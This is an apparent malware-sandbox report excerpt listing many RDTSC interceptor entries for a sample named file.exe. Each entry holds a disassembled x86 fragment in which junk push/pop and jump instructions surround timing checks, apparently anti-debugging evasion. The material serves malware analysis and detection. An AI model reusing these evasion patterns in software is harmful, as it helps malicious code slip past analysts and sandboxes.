                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DB83 second address: A2DB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2DB89 second address: A2DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F684908B756h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E0DB second address: A2E0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E0E1 second address: A2E0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2E0E5 second address: A2E0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D747 second address: A2D74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38257 second address: A3825B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3825B second address: A3827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F684908B766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3827A second address: A382A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6849049238h 0x0000000a popad 0x0000000b jbe 00007F6849049246h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A382A3 second address: A382AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36DE8 second address: A36E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007F684904923Ah 0x0000000b jmp 00007F6849049234h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36E0A second address: A36E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A370BD second address: A370C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A370C5 second address: A370E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F684908B764h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A370E7 second address: A37106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6849049235h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3725C second address: A3726A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3726A second address: A37271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37271 second address: A37277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37277 second address: A3727B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A376A2 second address: A376A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A376A6 second address: A376B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0569 second address: 9E056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3810B second address: A38118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38118 second address: A3811E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3811E second address: A38124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36988 second address: A36992 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7190 second address: 9F719A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6849049226h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F80CE second address: 9F80D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F80D3 second address: 9F80D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F80D9 second address: 9F80DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F80DD second address: 9F8138 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6849049226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6849049230h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F6849049233h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F684904922Dh 0x00000025 jmp 00007F6849049234h 0x0000002a popad 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8226 second address: 9F822C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F822C second address: 9F82D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F6849049237h 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f jmp 00007F6849049233h 0x00000014 pop edi 0x00000015 nop 0x00000016 pushad 0x00000017 mov dword ptr [ebp+1244E49Ch], eax 0x0000001d push ebx 0x0000001e jmp 00007F6849049232h 0x00000023 pop eax 0x00000024 popad 0x00000025 jng 00007F6849049227h 0x0000002b cld 0x0000002c lea eax, dword ptr [ebp+1247BD6Ah] 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F6849049228h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c jng 00007F684904922Ch 0x00000052 or dword ptr [ebp+122D31B0h], eax 0x00000058 push edi 0x00000059 sbb ecx, 53E16226h 0x0000005f pop edx 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F6849049233h 0x0000006a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F82D3 second address: 9F82D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F82D9 second address: 9E0569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F684904923Eh 0x00000010 nop 0x00000011 jns 00007F684904922Ch 0x00000017 call dword ptr [ebp+122D1DA1h] 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BD4B second address: A3BD50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F73D1 second address: 9F73D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BEA2 second address: A3BEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BEA8 second address: A3BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BEAE second address: A3BEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F684908B760h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C02C second address: A3C07C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049234h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6849049231h 0x0000000f jmp 00007F6849049236h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop ecx 0x0000001e push ebx 0x0000001f push edi 0x00000020 pop edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C4C5 second address: A3C4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C5FD second address: A3C603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C603 second address: A3C608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C608 second address: A3C612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6849049226h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C612 second address: A3C652 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F684908B768h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F684908B769h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C652 second address: A3C65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6849049226h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C65C second address: A3C660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43491 second address: A43495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42DD6 second address: A42DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45398 second address: A453A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6849049226h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A453A2 second address: A453A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A453A8 second address: A453B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F6849049226h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A453B8 second address: A453BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A453BC second address: A453D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6849049232h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A453D4 second address: A453F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F684908B756h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F684908B75Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A453F0 second address: A45416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6849049236h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45416 second address: A4541D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A2A5 second address: A4A2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A2A9 second address: A4A2AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4990E second address: A4993A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jnc 00007F684904924Eh 0x0000000d jo 00007F684904923Ch 0x00000013 jmp 00007F6849049236h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49A90 second address: A49A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D0C second address: A49D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D12 second address: A49D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49D17 second address: A49D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6849049232h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D22A second address: A4D236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CAC2 second address: A4CACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6849049226h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CACF second address: A4CAEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B768h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CAEC second address: A4CB04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F6849049226h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CB04 second address: A4CB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4CB0A second address: A4CB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A536D0 second address: A536F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F684908B767h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A536F5 second address: A536F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5209D second address: A520B5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F684908B75Eh 0x00000008 jno 00007F684908B756h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F684908B756h 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A520B5 second address: A520B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52208 second address: A52215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52215 second address: A5223B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6849049226h 0x0000000a popad 0x0000000b jmp 00007F6849049231h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F6849049226h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52396 second address: A5239A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5239A second address: A523A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A523A2 second address: A523AF instructions: 0x00000000 rdtsc 0x00000002 js 00007F684908B758h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A527E4 second address: A5280B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F6849049228h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f ja 00007F6849049226h 0x00000015 jmp 00007F684904922Eh 0x0000001a pop edx 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7BCB second address: 9F7C0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F684908B75Eh 0x0000000e nop 0x0000000f add dword ptr [ebp+122D375Fh], ebx 0x00000015 jmp 00007F684908B760h 0x0000001a mov ebx, dword ptr [ebp+1247BDA9h] 0x00000020 and edi, dword ptr [ebp+122D3A7Fh] 0x00000026 add eax, ebx 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F7C0F second address: 9F7C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52967 second address: A5296D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5296D second address: A52973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52A85 second address: A52A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52A89 second address: A52A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52A8F second address: A52A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52A95 second address: A52A9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52A9A second address: A52ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F684908B756h 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007F684908B756h 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52ABC second address: A52AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52AC4 second address: A52AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A533B7 second address: A533BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A533BD second address: A533C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A533C5 second address: A533DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F684904922Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
